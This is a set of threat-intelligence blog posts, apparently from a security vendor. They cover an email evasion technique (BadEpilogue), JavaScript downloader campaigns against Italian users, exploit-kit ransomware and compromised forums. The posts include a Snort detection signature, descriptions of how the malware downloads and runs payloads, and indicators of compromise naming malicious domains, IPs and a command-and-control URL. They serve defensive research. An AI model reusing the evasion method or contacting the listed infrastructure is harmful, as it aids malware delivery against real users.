Talking about Antispam systems, Certego contacted Google and TrendMicro: both vendors confirmed the existence of the problem and promptly released a fix for it.

Detecting BadEpilogue using a SNORT signature

Certego also created the following Snort signature, that should detect all incoming SMTP messages exploiting the BadEpilogue evasion technique.

alert tcp any any -> $HOME_NET [25,587] (msg:"CERTEGO CURRENT_EVENTS Incoming SMTP Message with Possibly Malicious MIME Epilogue 2016-05-13 (BadEpilogue)"; flow:to_server,established; content:"|0d 0a|Content-Type|3a 20|multipart|2f|mixed|3b|"; pcre:"/\x0d\x0a--(?P<boundary>[\x20\x27-\x29\x2b-\x2f0-9\x3a\x3d\x3fA-Z\x5fa-z]{1,70})--(?:\x0d\x0a(?!--|\x2e|RSET).*)*\x0d\x0a--(?P=boundary)\x0d\x0a/"; reference:url,www.certego.net/en/news/badepilogue-the-perfect-evasion/; classtype:bad-unknown; sid:9000501; rev:3;)

The campaigns

As mentioned, this evasion technique has been detected in the wild since May 2016, in at least eleven different campaigns exclusively targeting Italian users. These campaigns use messages written in a fluent Italian asking the user to open an attachment labeled as invoice or payment receipt. The attachment is in ZIP format and it contains a malware in PE EXE format. This attack pattern is typical of the so-called Viral Spam that has been prevalent until a few months ago, but it has now been deemed ineffective by antispam filters blocking ZIP files containing PE EXE. In this case, the BadEpilogue evasion technique allows the attacker to generate extremely effective campaigns that can reach a very high number of targets.

While the first campaigns were spreading a malicious attachment containing a Trojan Downloader of the Fareit family which downloaded a variant of the Andromeda Infostealer, the latest campaigns have started working mainly with ransomware and in the last few days we have observed a massive amount of emails containing Zlader.

The following picture shows the various campaigns using the BadEpilogue evasion technique as reported by our systems.

The following picture shows the geolocation of IP addresses used to spread the malicious emails. Spreading patterns seem to be related to a single botnet that is expanding and contracting over time. This seems to be confirmed also by the fact that so far only Italian users have been targeted by these attacks.

Italian spam campaigns using JS/Nemucod downloader

Pietro Delsante — Wed, 14 Oct 2015 22:00:00 GMT

Abstract

In the last few days, since October 7, 2015, Certego's spamtrap started analyzing three different malware campaigns targeted to Italian users. All three campaigns are using a JavaScript downloader called JS/Nemucod, which is attached directly to the emails inside a ZIP file. When the user opens the zip file and double clicks the JavaScript, the default file type associations in Windows will cause Internet Explorer to open and execute the JavaScript.

Campaign

We were able to identify three different campaigns, all of them being targeted specifically at Italian users: in all cases, emails were written in Italian, and so was the PDF document used as a decoy.

Campaign 0710TIT

This campaign started hitting our mailboxes on October 7. Some examples of attachment names are:

Some examples of the JavaScript files inside the zip are:

The variant of JS/Nemucod used in this campaign is employing two different layers of obfuscation, both of them using a simple bitwise XOR with a 12 to 14-byte long key. In the first layer, all the JavaScript code is obfuscated; the second layer only obfuscates the domain names of the Command & Control servers.

Once executed, Nemucod will instantiate three different ActiveX controls: WScript.Shell, MSXML2.XMLHTTP and ADODB.Stream. To make a long story short, Nemucod will use them to save an executable file to the temporary folder %TEMP% and to run it; right after that, Nemucod will open a legitimate PDF file in the browser: this document is uses as a decoy to let the user believe they're actually viewing a real invoice, as shown below.

This version of the JavaScript file downloads a simple EXE file which is then invoked directly in the background through the WScript.Shell ActiveX control. Right after that, the malware opens the decoy PDF document through the ADODB.Stream ActiveX control.

Campaign 0810DTIT

This campaign started hitting our sandbox on October 8. Attachment names are very similar to the first campaign:

Even the JavaScript files are pretty much the same:

However, this second campaign does not download an EXE file; instead, it downloads a DLL library which is then invoked by running rundll32.exe through the WScript.Shell ActiveX control. The DLL's entry point is the non-standard function name "DLLRegisterServer". Once again, right after that, the malware uses the ADODB.Stream ActiveX control to open the decoy PDF file.

Campaign 1410DTIT

The last campaign started hitting our sandbox early this morning, even if its name suggests that it probably started yesterday. This campaign uses a different naming for both the compressed file and its content, some examples being:

This campaign also downloads a DLL library which is invoked through rundll32.exe; the entry point is still "DLLRegisterServer" and the decoy PDF document is always the same.

The payload

Execution of these campaigns in our Sandbox showed that the executable files downloaded by Nemucod are used to retrieve a Trojan Downloader called Fareit or Pony Downloader, which in turn downloads another set of executable files containing the Gozi infostealer. Interestingly enough, the computer is rebooted after a few instants, and Gozi starts phoning home only after the reboot. This technique may be used to avoid detection in sandboxed environments.

Trivia

It looks like the bad guys made some mistakes in the setup of the Command & Control servers used by Nemucod. During our analyses we found out that sometimes the servers were replying with a HTTP header indicating that the file being server was an application/x-dosexec; but better analysis of the payload only showed an internal error generated by the script that probably packs the file before serving it, as shown in the following picture.

IOCs

Nemucod's C&C domains from the first campaign (0710TIT):

Second campaign (0810DTIT):

Third campaign (1410DTIT):

C&Cs for Gozi and Fareit/Pony Downloader

Snort Signatures

The following Snort signatures should help detect the execution of Nemucod; the first two of them will detect any request that looks like Nemucod's italian campaigns; the third and fourth will detect the server returning an executable or the decoy PDF.

UPDATE 2015-10-16

A better look at yesterday's traffic showed that the new campaigns were actually two: one with ID 1410DTIT and the other with ID 14IT10M. Looking at timestamps shows that 14IT10M was probably released a few hours after 1410DTIT. Both campaigns are already covered by the Snort signatures that we released yesterday, and that have been included in today's release by Emerging Threats.

Intel Owl 1.0.0 released

Matteo Lodi, Threat Intel Team Leader — Wed, 14 Oct 2015 22:00:00 GMT

Intel Owl is an Open Source Intelligence, or OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale. It integrates a number of analyzers available online and is for everyone who needs a single point to query for info about a specific file or observable.

Born at the start of 2020 (announcement), this fresh and new tool was accepted as part of the Google Summer of Code under the hat of The Honeynet Project. Great improvements have been developed since the start of this project.

Now, thanks to the ongoing collaboration with Google Summer of Code and The Honeynet Project, we are excited to announce release 1.0.0, with a completely new and revamped web interface and some new features in our API to help you better manage your threat intelligence data.

You can read some more details about Intel Owl 1.0.0 in the official release announcement, co-authored by Eshaan Bansal (GSoC Student) and his mentor, our own Matteo Lodi, and published on The Honeynet Project's blog.

Nuclear Exploit Kit serving new Ransomware variant

Thu, 13 Aug 2015 22:00:00 GMT

A few hours ago Certego's Incident Response Team detected a malware campaign serving a new Ransomware variant through Nuclear Pack Exploit Kit.

Compromised web sites redirect the user to the Exploit Kit's first step, located at IP address 85.143.218 .208. The domain name used for this first step varies over time, and some of the variants we saw are:

mexicoss.everythingcannabis .biz shift.boutiqueeuphoria .com

The resource name, instead, does not seem to change:

/customerss/detect.js

The second step is located at IP address 62.76.180 .20 and some of the domain names we saw are:

actually.murdererswelcome .com utah.murwel .com

In this case, the resources seem to mimic the behaviour of a search engine:

/search?q=...

The Exploit Kit serves a Flash SWF file with a 0/56 detection rate on VirusTotal.

The execution of this exploit causes the download of a payload that is obfuscated by running a byte-wise XOR with a 7 bytes long key, as shown in the picture below.

Deobfuscation is pretty simple and leads to a PE file (Windows executable) that has a pretty low detection rate on VirusTotal (2/56), with only AhnLab-v3 and SUPERAntiSpyware detecting it as malicious.

But what does this malware do? Execution on Certego's sandbox shows it will encrypt all of the files on the affected PC, renaming them in the form:

<original_name>.id-_

with <original_name> being the original file name, being a unique ID the malware gives to each victim, and being the address to contact to get the decryption instructions.

The most peculiar characteristic of this ransowmare is the fact that it does not give you clear instructions for the payment: it simply renames all your files, and you'll have to be smart enough to understand that all you have to do is to contact the email address you see appended in your file names. The fact that almost no antivirus solution is still able to correctly detect this ransomware shows that it's probably a brand new piece of malware. We still haven't analyzed it, so we still cannot say anything, but right after being executed, the malware makes a single POST request to the following site:

http://permanencez .com/script.php

The content of the POST request and the subsequent server response are shown below.

Basically, the malware sends its C&C server a unique ID, the hostname of the infected machine, the whole string appended to the file names (using the format shown above) and a number that appears to be randomly generated. The server answers with a binary string that may contain the encryption key - but we still have to verify this point. They also seem to be using one or more Squid instances as reverse proxies to hide the real C&C's address.

The exploit kit can be detected by using the following two Emerging Threats Snort/Suricata signatures:

ET CURRENT_EVENTS DRIVEBY Nuclear EK SWF M2

However, the download of the XOR-ed payload and the malware's request to the above mentioned C&C Server do not seem to trigger any alert on Snort at the moment.

Several Italian forums compromised with Exploit Kit

Thu, 05 Feb 2015 23:00:00 GMT

How it works

The affected forum sites have been previously compromised, possibly exploiting vulnerabilities in software platforms used for forums management, namely vBulletin version 4.1.9 and IP Board version 3.4.6. Users who visit the forum pages are redirected to external sites to download the so called Nuclear Pack Exploit Kit, a software container that provides the ability to leverage several vulnerabilities on user machines in order to infect them and gain complete control. In this particular case, files in .swf format are used to exploit the latest Adobe Flash Player vulnerabilities.

All the forums identified by Certego as being compromised during this campaign have URLs in the following format:

http://[domain]/forums/threads/[id]-[slug] with domains like:

[random_long_string].[domain] For example, these are some of the domains used to distribute Nuclear Pack, albeit not all of them are still reachable and active:

72ni9v3j9chko9ak5u4uwhf.nostaljiyemekler [.] com ey03cunzlam19kc1v9ee9jf.gumuspastabodrum [.] com ftafyk9wkvu42523ju20iri.devletdestegi [.] com We also identified some of the IP addresses on which the malicious domains are are hosted, in example:

195.154.166[.]120 213.238.168[.]139 213.238.166[.]227 Some of the IPs as well are no longer reachable and may have been cleaned, but most of them are still active and dangerous.

A few of these IP addresses belong to Virtual Private Servers purchased specifically for the installation of Nuclear Pack Exploit Kit, while others, used only as the first step in the redirection chain, are more likely to be compromised hosts. Gaining the control of these servers in the first place has allowed the creation of sub-domains with random names used for the distribution of malware. As a matter of fact, this way the Exploit Kit is reachable only by knowing beforehand the subdomain used, and is therefore much more protected from accidental discovery.

Countermeasures

This attack exploits vulnerabilities in Flash Player, which therefore must be updated to the latest version If you suspect to be already compromised, you can try to remove the infection using the following free products:

A more radical solution is to uninstall the Flash plug-in browser, or to limit the operation selectively, as explained in this guide, but this must be carefully evaluated because of the impacts it may have on usability and user experience in a production environment.